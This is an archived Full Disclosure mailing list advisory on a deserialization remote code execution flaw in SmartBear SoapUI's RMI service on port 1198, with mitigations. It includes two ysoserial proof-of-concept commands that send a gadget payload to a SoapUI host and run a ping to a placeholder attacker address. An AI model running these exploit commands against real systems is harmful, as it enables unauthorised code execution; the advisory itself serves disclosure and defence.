Full Disclosure mailing list archives
SmartBear SoapUI - Remote Code Execution via Deserialization
From: Etnies <kuba25101990 () gmail com>
Date: Thu, 5 Oct 2017 12:17:46 +0200
Title: SmartBear SoapUI - Remote Code Execution via Deserialization Author: Jakub Palaczynski Date: 12. July 2017 Exploit tested on: ================== SoapUI 5.3.0 Also works on older versions. Vulnerability: ************** Remote Code Execution via Deserialization: ================================= SoapUI by default listens on all interfaces on TCP port 1198 where you can find SoapUI Integration (RMI) instance. SoapUI uses vulnerable Java libraries (commons-collections-3.2.1.jar and groovy-all-2.1.7.jar) which can be used to remotly execute commands with permissions of user that started SoapUI. Entry point: Java RMI Registry on TCP port 1198 Vulnerable libraries used - commons-collections-3.2.1.jar and groovy-all-2.1.7.jar Proof of Concept: Sample PoC using Commons Collections vulnerable library: java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 CommonsCollections1 'ping OUR_IP' Sample PoC using Groovy vulnerable library: java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping OUR_IP' Mitigations: - bind SoapUI Integration instance to localhost if possible - update all Java libraries that are known to be vulnerable: commons-collections-3.2.1.jar groovy-all-2.1.7.jar Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- SmartBear SoapUI - Remote Code Execution via Deserialization Etnies (Oct 06)